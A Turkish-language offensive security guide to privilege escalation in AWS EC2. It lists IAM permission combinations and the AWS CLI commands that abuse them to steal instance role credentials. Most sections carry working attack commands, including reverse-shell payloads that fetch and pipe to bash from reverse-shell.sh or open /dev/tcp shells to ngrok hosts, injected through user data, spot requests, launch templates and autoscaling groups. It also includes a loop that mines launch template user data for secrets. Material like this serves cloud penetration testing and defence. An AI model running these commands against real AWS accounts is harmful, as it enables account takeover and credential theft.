AWS - EC2 Privesc

EC2

Daha fazla EC2 hakkında bilgi için kontrol edin:

iam:PassRole, ec2:RunInstances

Bir saldırgan bir IAM rolü ekleyerek bir örnek oluşturabilir ve ardından örneğe erişerek IAM rolü kimlik bilgilerini metadata uç noktasından çalabilir.

• SSH ile Erişim

Bir oluşturulmuş ssh anahtarı (--key-name) kullanarak yeni bir örnek çalıştırın ve ardından buna ssh ile bağlanın (yeni bir tane oluşturmak istiyorsanız ec2:CreateKeyPair iznine sahip olmanız gerekebilir).

aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--iam-instance-profile Name=<instance-profile-name> --key-name <ssh-key> \
--security-group-ids <sg-id>

• Kullanıcı verisinde rev shell ile erişim

Yeni bir örnek çalıştırabilirsiniz, bu örnek kullanıcı verisi (--user-data) kullanarak size bir rev shell gönderecektir. Bu şekilde güvenlik grubunu belirtmenize gerek yoktur.

echo '#!/bin/bash
curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh

aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--iam-instance-profile Name=E<instance-profile-name> \
--count 1 \
--user-data "file:///tmp/rev.sh"

GuradDuty ile dikkatli olun, eğer IAM rolünün kimlik bilgilerini örneğin dışındaki bir yerde kullanıyorsanız:

Olası Etki: Mevcut örnek profillerine bağlı herhangi bir EC2 rolüne doğrudan privesc.

ECS'ye Privesc

Bu izin seti ile bir EC2 örneği oluşturabilir ve bunu bir ECS kümesine kaydedebilirsiniz. Bu şekilde, ECS hizmetleri erişiminiz olan EC2 örneği içinde çalıştırılacaktır ve ardından bu hizmetlere (docker konteynerleri) sızabilir ve onlara bağlı ECS rollerini çalabilirsiniz.

aws ec2 run-instances \
--image-id ami-07fde2ae86109a2af \
--instance-type t2.micro \
--iam-instance-profile <ECS_role> \
--count 1 --key-name pwned \
--user-data "file:///tmp/asd.sh"

# Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs)
# The EC2 instance profile needs basic ECS access
# The content of the user data is:
#!/bin/bash
echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;

Yeni EC2 örneğinde ECS hizmetlerini çalıştırmayı zorlamak için öğrenmek üzere kontrol edin:

Eğer yeni bir örnek oluşturamıyorsanız ancak ecs:RegisterContainerInstance iznine sahipseniz, kümeye örneği kaydedebilir ve yorumlanan saldırıyı gerçekleştirebilirsiniz.

Olası Etki: Görevlerle ilişkilendirilmiş ECS rollerine doğrudan privesc.

iam:PassRole, iam:AddRoleToInstanceProfile

Önceki senaryoya benzer şekilde, bu izinlere sahip bir saldırgan ele geçirilmiş bir örneğin IAM rolünü değiştirebilir böylece yeni kimlik bilgilerini çalabilir. Bir örnek profili yalnızca 1 role sahip olabileceğinden, eğer örnek profili zaten bir role sahipse (yaygın durum), ayrıca iam:RemoveRoleFromInstanceProfile iznine de ihtiyacınız olacaktır.

# Removing role from instance profile
aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-name <name>

# Add role to instance profile
aws iam add-role-to-instance-profile --instance-profile-name <name> --role-name <name>

Eğer örnek profilinde bir rol varsa ve saldırgan bunu kaldıramıyorsa, başka bir çözüm yolu vardır. O, rolü olmayan bir örnek profili bulabilir veya yeni bir tane oluşturabilir (iam:CreateInstanceProfile), rolü o örnek profiline ekleyebilir (daha önce tartışıldığı gibi) ve örnek profilini ele geçirilmiş bir örneğe ilişkilendirebilir:

• Eğer örneğin hiçbir örnek profili yoksa (ec2:AssociateIamInstanceProfile) *

aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>

Olası Etki: Farklı bir EC2 rolüne doğrudan yetki yükseltme (bir AWS EC2 örneğini ele geçirmiş olmanız ve bazı ek izinlere veya belirli bir örnek profil durumuna sahip olmanız gerekir).

iam:PassRole(( ec2:AssociateIamInstanceProfile& ec2:DisassociateIamInstanceProfile) || ec2:ReplaceIamInstanceProfileAssociation)

Bu izinlerle, bir örneğe bağlı olan örnek profilini değiştirmek mümkündür, bu nedenle saldırı zaten bir örneğe erişim sağladıysa, ona bağlı olanı değiştirerek daha fazla örnek profil rolü için kimlik bilgilerini çalabilecektir.

• Eğer bir örnek profili varsa, örnek profilini kaldırabilir (ec2:DisassociateIamInstanceProfile) ve iliştirebilirsiniz *

aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da
aws ec2 disassociate-iam-instance-profile --association-id <value>
aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>

• veya ele geçirilen örneğin örnek profilini değiştirin (ec2:ReplaceIamInstanceProfileAssociation). *

```bash
aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=<value> --association-id <value>
```

Olası Etki: Farklı bir EC2 rolüne doğrudan yetki yükseltme (bir AWS EC2 örneğini ele geçirmiş olmanız ve bazı ek izinlere veya belirli bir örnek profil durumuna sahip olmanız gerekir).

ec2:RequestSpotInstances,iam:PassRole

ec2:RequestSpotInstances ve iam:PassRole izinlerine sahip bir saldırgan, bağlı bir EC2 rolü ve kullanıcı verisinde bir rev shell ile bir Spot Instance talep edebilir. Örnek çalıştırıldığında, IAM rolünü çalabilir.

REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)

aws ec2 request-spot-instances \
--instance-count 1 \
--launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}"

ec2:ModifyInstanceAttribute

ec2:ModifyInstanceAttribute yetkisine sahip bir saldırgan, örneklerin özelliklerini değiştirebilir. Bunlar arasında, kullanıcı verisini değiştirebilir, bu da örneğin rastgele verileri çalıştırmasına olanak tanır. Bu, EC2 örneğine bir rev shell almak için kullanılabilir.

Özelliklerin yalnızca örnek durdurulduğunda değiştirilebileceğini unutmayın, bu nedenle izinler ec2:StopInstances ve ec2:StartInstances.

TEXT='Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"

#!/bin/bash
bash -i >& /dev/tcp/2.tcp.ngrok.io/14510 0>&1
--//'
TEXT_PATH="/tmp/text.b64.txt"

printf $TEXT | base64 > "$TEXT_PATH"

aws ec2 stop-instances --instance-ids $INSTANCE_ID

aws ec2 modify-instance-attribute \
--instance-id="$INSTANCE_ID" \
--attribute userData \
--value file://$TEXT_PATH

aws ec2 start-instances --instance-ids $INSTANCE_ID

Olası Etki: Oluşturulan bir örneğe ekli herhangi bir EC2 IAM Rolüne doğrudan yetki yükseltme.

ec2:CreateLaunchTemplateVersion,ec2:CreateLaunchTemplate,ec2:ModifyLaunchTemplate

ec2:CreateLaunchTemplateVersion,ec2:CreateLaunchTemplate ve ec2:ModifyLaunchTemplate izinlerine sahip bir saldırgan, kullanıcı verisinde bir rev shell ile yeni bir Başlatma Şablonu sürümü oluşturabilir ve üzerinde herhangi bir EC2 IAM Rolü ekleyebilir, varsayılan sürümü değiştirebilir ve o Başlatma Şablonunu kullanan herhangi bir Autoscaler grubunun en son veya varsayılan sürümü kullanacak şekilde yapılandırılmış olması durumunda, o şablonu kullanarak örnekleri yeniden çalıştıracak ve rev shell'i çalıştıracaktır.

REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)

aws ec2 create-launch-template-version \
--launch-template-name bad_template \
--launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}"

aws ec2 modify-launch-template \
--launch-template-name bad_template \
--default-version 2

Olası Etki: Farklı bir EC2 rolüne doğrudan yetki yükseltme.

autoscaling:CreateLaunchConfiguration, autoscaling:CreateAutoScalingGroup, iam:PassRole

autoscaling:CreateLaunchConfiguration,autoscaling:CreateAutoScalingGroup,iam:PassRole izinlerine sahip bir saldırgan, bir IAM Rolü ve kullanıcı verisi içinde bir rev shell ile bir Başlatma Yapılandırması oluşturabilir, ardından o yapılandırmadan bir otomatik ölçekleme grubu oluşturabilir ve rev shell'in IAM Rolünü çalmasını bekleyebilir.

aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \
--launch-configuration-name bad_config \
--image-id ami-0c1bc246476a5572b \
--instance-type t3.micro \
--iam-instance-profile EC2-CloudWatch-Agent-Role \
--user-data "$REV"

aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \
--auto-scaling-group-name bad_auto \
--min-size 1 --max-size 1 \
--launch-configuration-name bad_config \
--desired-capacity 1 \
--vpc-zone-identifier "subnet-e282f9b8"

Potansiyel Etki: Farklı bir EC2 rolüne doğrudan yetki yükseltme.

!autoscaling

ec2:CreateLaunchTemplate ve autoscaling:CreateAutoScalingGroup izinleri IAM rolüne yetki yükseltmek için yeterli değildir çünkü Launch Configuration veya Launch Template'de belirtilen rolü eklemek için iam:PassRole ve ec2:RunInstances izinlerine ihtiyacınız var (bu bilinen bir yetki yükseltmedir).

ec2-instance-connect:SendSSHPublicKey

ec2-instance-connect:SendSSHPublicKey iznine sahip bir saldırgan, bir kullanıcıya bir ssh anahtarı ekleyebilir ve bunu erişim sağlamak için kullanabilir (eğer örneğe ssh erişimi varsa) veya yetkileri yükseltmek için kullanabilir.

aws ec2-instance-connect send-ssh-public-key \
--instance-id "$INSTANCE_ID" \
--instance-os-user "ec2-user" \
--ssh-public-key "file://$PUBK_PATH"

Olası Etki: Çalışan örneklere bağlı EC2 IAM rollerine doğrudan yetki yükseltme.

ec2-instance-connect:SendSerialConsoleSSHPublicKey

ec2-instance-connect:SendSerialConsoleSSHPublicKey iznine sahip bir saldırgan, bir seri bağlantıya ssh anahtarı ekleyebilir. Eğer seri etkin değilse, saldırganın bunu etkinleştirmek için ec2:EnableSerialConsoleAccess iznine ihtiyacı vardır.

Seri porta bağlanmak için ayrıca makine içindeki bir kullanıcının kullanıcı adı ve şifresini bilmeniz gerekir.

aws ec2 enable-serial-console-access

aws ec2-instance-connect send-serial-console-ssh-public-key \
--instance-id "$INSTANCE_ID" \
--serial-port 0 \
--region "eu-west-1" \
--ssh-public-key "file://$PUBK_PATH"

ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws

Bu yol, bunu istismar etmek için bir kullanıcı adı ve şifre bilmeniz gerektiğinden, privesc için çok faydalı değildir.

Potansiyel Etki: (Son derece kanıtlanamaz) Çalışan örneklere bağlı EC2 IAM rollerine doğrudan privesc.

describe-launch-templates,describe-launch-template-versions

Başlatma şablonları sürümlemeye sahip olduğundan, ec2:describe-launch-templates ve ec2:describe-launch-template-versions izinlerine sahip bir saldırgan, kullanıcı verilerinde bulunan kimlik bilgileri gibi hassas bilgileri keşfetmek için bunları istismar edebilir. Bunu başarmak için, aşağıdaki betik mevcut başlatma şablonlarının tüm sürümlerini döngüye alır:

for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId')
do
echo "[*] Analyzing $i"
aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata
do
echo "VersionNumber: $version"
echo "$userdata" | base64 -d
echo
done | grep -iE "aws_|password|token|api"
done

Yukarıdaki komutlarda, belirli desenleri (aws_|password|token|api) belirtmemize rağmen, diğer hassas bilgileri aramak için farklı bir regex kullanabilirsiniz.

aws_access_key_id ve aws_secret_access_key bulduğumuzu varsayarsak, bu kimlik bilgilerini AWS'ye kimlik doğrulamak için kullanabiliriz.

Olası Etki: IAM kullanıcı(ları) için doğrudan ayrıcalık yükseltme.

Referanslar

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/